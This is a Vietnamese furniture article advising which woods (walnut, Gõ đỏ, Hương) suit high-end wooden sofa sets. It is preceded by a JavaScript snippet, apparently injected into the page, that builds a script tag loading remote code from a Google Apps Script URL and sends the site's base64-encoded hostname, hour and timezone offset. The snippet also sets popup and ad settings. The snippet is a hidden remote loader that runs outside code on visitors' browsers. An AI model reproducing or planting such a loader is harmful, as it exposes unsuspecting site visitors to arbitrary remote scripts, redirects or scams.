var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Bàn ghế sa lông gỗ cao cấp nên chọn chất liệu nào?

Dòng bàn ghế sa lông gỗ cao cấp hiện được sản xuất với rất nhiều chất liệu khác nhau. Vậy nên lựa chọn loại gỗ nào cho bộ bàn ghế gỗ? Dưới đây là những thông tin hữu ích mà chúng tôi chia sẻ, quý vị tham khảo ngay để có sự lựa chọn đúng đắn nhất nhé!

Các chất liệu nên chọn khi mua bàn ghế sa lông gỗ cao cấp

Bên cạnh những mẫu ghế sofa da cao cấp thì hiện nay có rất nhiều người ưa chuộng sử dụng dòng ghế sofa gỗ tự nhiên. Sản phẩm này hiện được sản xuất với rất nhiều chất liệu khác nhau. Vì vậy nhiều người chưa biết nên lựa chọn chất liệu nào cho không gian sống?

Dưới đây là những gợi ý của chúng tối khi chọn mua bàn ghế sa lông gỗ cao cấp có chất liệu phù hợp, được nhiều người lựa chọn sử dụng hiện nay.

Bàn ghế gỗ Óc chó cao cấp

Bàn ghế sa lông gỗ cao cấp
Bàn ghế gỗ óc chó chất lượng cao

 

Bàn ghế phòng khách nên dùng gỗ gì? Quý vị tham khảo ngay những mẫu bàn ghế gỗ Óc chó cho phòng khách nhà mình nếu như đang có nhu cầu về dòng ghế sofa gỗ cao cấp. Đây là chất liệu đang được nhiều người ưa chuộng sử dụng hiện nay trong căn hộ chung cư cao cấp, biệt thự hiện đại.

Bàn ghế gỗ Óc chó có tone màu sang trọng kết hợp với vân gỗ tự nhiên đẹp. Ngoài ra, sản phẩm này thường được kết hợp với đệm mút bọc da nên càng tôn thêm vẻ đẹp đẳng cấp cho không gian.

Bàn ghế gỗ Gõ đỏ, gỗ Hương

Bàn ghế sa lông gỗ cao cấp
Bàn ghế gỗ Hương đá đẹp

Một chất liệu nữa mà quý vị không nên bỏ qua khi mua bàn ghế sa lông gỗ cao cấp đó là chất liệu gỗ Gõ đỏ hoặc gỗ Hương. Có rất nhiều các mẫu bàn ghế gỗ phòng khách đơn giản sản xuất từ chất liệu gỗ này cho quý vị tham khảo.

Sản phẩm mang tới giá trị thẩm mỹ cao cho không gian. Đồng thời còn có tuổi thọ sử dụng lâu dài, vì vậy được nhiều người lựa chọn.

Trên đây là những gợi ý của chúng tôi dành cho quý vị khi chọn mua bàn ghế gỗ hiện đại cao cấp, hãy tham khảo ngay nhé!